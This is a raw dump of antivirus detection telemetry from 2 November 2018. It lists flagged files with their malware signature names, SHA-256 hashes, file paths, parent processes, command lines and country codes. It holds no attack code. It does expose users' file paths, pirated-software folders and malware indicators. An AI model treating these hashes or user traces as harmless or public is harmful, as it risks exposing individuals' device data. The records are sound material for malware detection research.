  Row(detection=Row(filename='raidreconstructor.exe', filepath='E:\\HBCD\\Programs\\RAIDReconstructor.exe', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\RAIDReconstructor.exe", filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221522-5e1caa67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221522-5E1CAA67', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101913-984a698b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101913-984A698B', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082751-9bad34b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082751-9BAD34B0', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='H:\\HBCD\\Programs\\RAIDRECONSTRUCTOR.EXE', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='31b66f92b78e46c69cdbe00a5200df2c65b58f4d27471e77d779b8ccb8c75e72', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:26:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:20:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:09:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\视频编辑专家 9.1\\msimg32.dll', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R345'), hash='329e0f584efd6cfcdb1344f270757d35394cc548f31be46bedd3d16944895e68', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='babylon 8.x.x.x universal_patch_under seh team.exe', filepath='\\\\?\\F:\\ANDREAS\\ALT\\DATEN\\Software\\Babylon\\Babylon 8.x.x.x Universal_Patch_Under SEH Team.exe', filesize=128000, name='TR/Crypt.XPACK.Gen5.#M300.#R400233'), hash='32c35516d22bd9ccd46f86c7ca582119b8e4e41920197d554912e2994f58bc4c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zbd.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\ZBD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='32e359d84adff5e9c4a53e76aefa4f8ce45b6d3f829616f1c9082581d8d26dad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aplikasi-pkg-sg14032015.xls', filepath='G:\\pn ku\\Aplikasi-PKG-SG14032015.xls', filesize=7296000, name='X2000M/Agent.91364890.#M1.#R1'), hash='3330815b83ddf3ecf2e7b7bddfb83ae9fde8c7b9adf2fd92dcb406a9287a9860', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T06:03:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='guid-849ba1c9-1360-475e-9f01-4f35dde73330-1.htm', filepath='D:\\acad2013\\en-US\\Docs\\acad_install_help\\files\\GUID-849BA1C9-1360-475E-9F01-4F35DDE73330-1.htm', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='33543c012ed52b953846f308059dce5fcae5b3c03ced288fc620305df181266c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T23:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='337e8ed599121fc14851f4321067e8a572724168e8504b66af2f32c4da60083f', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wechatweb.exe', filepath='C:\\PROGRAM FILES (X86)\\Tencent\\WeChat\\WeChatWeb.exe', filesize=1208000, name='W32/Sality.AT.#M1.#R1'), hash='339f01ef66f8a7ed4a5069a9a0ded2bbb922fa0e7b00b3671be9d10f91cc8593', metadata=Row(cmdline='-autorun', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\WeChat\\WeChat.exe', parentsize=492744, timestamp='2018-11-02T09:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='F:\\HBCD\\Programs\\DriverImportPE.exe', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081230-25fb3d4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081230-25FB3D4C', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:12:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverImportPE.exe", filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='E:\\HBCD\\Programs\\DriverImportPE.exe', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102101-a76b7366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102101-A76B7366', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d274', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d274', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d296', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d296', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d252', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d252', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d20c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d20c', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:49:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d230', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d230', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:49:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d2b8', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d2b8', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='359b9d05250d48c16fca570a2542ac05218be427003cec0757ab4725646fbdc9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstall.exe', filepath='F:\\TABLET PHONE\\RGK.S4\\New folder (2)\\USB drivers_3\\USB drivers\\FlashUSB_Driver\\X64\\uninstall.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='35fa475f7cd2c806f197c0bed62b3e766e5e9ebc122140b9ba17ea43a58d151b', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T02:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstall.exe', filepath='F:\\TABLET PHONE\\RGK.S4\\New folder (2)\\USB drivers_3\\USB drivers\\FlashUSB_Driver\\X64\\uninstall.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='35fa475f7cd2c806f197c0bed62b3e766e5e9ebc122140b9ba17ea43a58d151b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T02:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='musnotification.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\MusNotification.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='362606529be5ab27450819ad1b21dfb265dd1a95b26950544d7db1d8da207d5b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192332-b8e78b57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03d723a3\\AVSCAN-20181101-191322-758FF685\\AVSCAN-20181101-192332-B8E78B57', filesize=7872000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='3640d6a3517401d2d33b731a1eb03c16559f3d56a60917dc6d4fc308dd14205b', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192857-dcbba80d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03d723a3\\AVSCAN-20181101-191322-758FF685\\AVSCAN-20181101-192857-DCBBA80D', filesize=7872000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='3640d6a3517401d2d33b731a1eb03c16559f3d56a60917dc6d4fc308dd14205b', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libwrapper30.exe', filepath='\\\\?\\D:\\A.CIVIL PROG\\revit14\\Autodesk_Revit_2014_English_Win_32-64bit_dlm\\x64\\RVT2014\\Program Files\\Common Files\\Autodesk Shared\\Revit Shared\\LibWrapper30.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='3653795d5ff63f218597bb5464d31cf664801140fbe632f54ef156dd108efcf7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104714-2a9338fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-104714-2A9338FC', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='366f8b30d41e00f2ca1e0eafb82016a536c1b189c0360440525626dfa51c89be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:49:12Z'), dt=datetime.date(2018, 11, 2)),
